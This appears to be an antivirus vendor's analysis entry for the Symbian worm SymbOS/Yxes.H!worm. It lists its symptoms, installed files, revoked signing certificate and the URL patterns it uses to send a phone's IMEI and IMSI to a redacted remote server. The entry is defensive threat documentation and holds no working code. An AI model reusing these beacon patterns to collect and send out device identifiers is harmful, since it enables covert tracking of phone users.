SymbOS/Yxes.H!worm

Alias/esWorm.SymbOS.Yxe.e (KAV)
Release DateMar 01, 2010
Detection Availability
Active DatabaseExtended Database
FortiGatelowhigh
FortiClient
FortiMailN/A
Current Antivirus Definition Database Version: 12.196
Description

Visible Symptoms

The repeated attempts by the worm to send SMS messages may yield:
  • abnormally high bill
  • rapid battery power loss
Presence of the following files:
  • c:\sys\bin\LanPackage.exe
  • c:\sys\bin\Installer_SV.exe

Detailed Analysis

SymbOS/Yxes.H!worm is classified as Symbian Worm. It is a a variant of SymbOS/Yxes.E!worm, with which it shares several functionalities (e.g killing some applications, gathering information on the phone, sending SMS messages...). The differences with SymbOS/Yxes.E!worm are:
  • The malware is named 'System Enhancement' and is known to be packaged as LanPackage.sisx.
  • The malware is signed: 
    Serial Number:
            ce:3d:00:01:00:23:4e:70:a5:52:ce:e8:28:d3
...
Subject: C=CN, ST=BJ, L=Beijing, O=Beijing GuoShengMingDao Technology Co. Ltd., 
OU=LanPackage_1  2.0.0, OU=Symbian Signed ContentID, 
CN=Beijing GuoShengMingDao Technology Co. Ltd.
    but the signature's certificate is already revoked: 
    Serial Number: CE3D000100234E70A552CEE828D3
        Revocation Date: Sep  8 13:43:34 2009 GMT
  • it contacts two new Java Server Pages on the malicious remote server, named Jump.jsp and KernelPara.jsp. 
    http://{REMOVED}/Jump.jsp?Version=2.0&PhoneType={TYPE}&PhoneImei={IMEI}&PhoneImsi={IMSI}&Source={SOURCE}
http://{REMOVED}/Kernel.jsp?Version=2.0&PhoneType={TYPE}&PhoneImei={IMEI}&PhoneImsi={IMSI}&Source={SOURCE}
http://{REMOVED}/KernelPara.jsp?Version=2.0&PhoneType={TYPE}&PhoneImei={IMEI}&PhoneImsi={IMSI}&Source={SOURCE}

Additionally, the malware creates/uses the following files:
  • C:\sys\bin\Installer_SV.exe: program that installs the malware correctly.
  • C:\sys\bin\LanPackage.exe: main malicious server
  • C:\system\data\SisInfo.cfg: configuration file used by the installer.
  • C:\system\data\Source.ini: written by the installer.
  • C:\System\Data\NotPure.txt
  • C:\system\data\Remote_Para.txt
  • C:\system\data\Local_Para.txt
  • C:\private\20028B98\SisInfo.cfg: copy of system data SisInfo.cfg
  • C:\private\20028B98\Source.ini: copy of system data Source.ini

Description Last Updated Date: Mar 02, 2010
Reference: ID - 1599341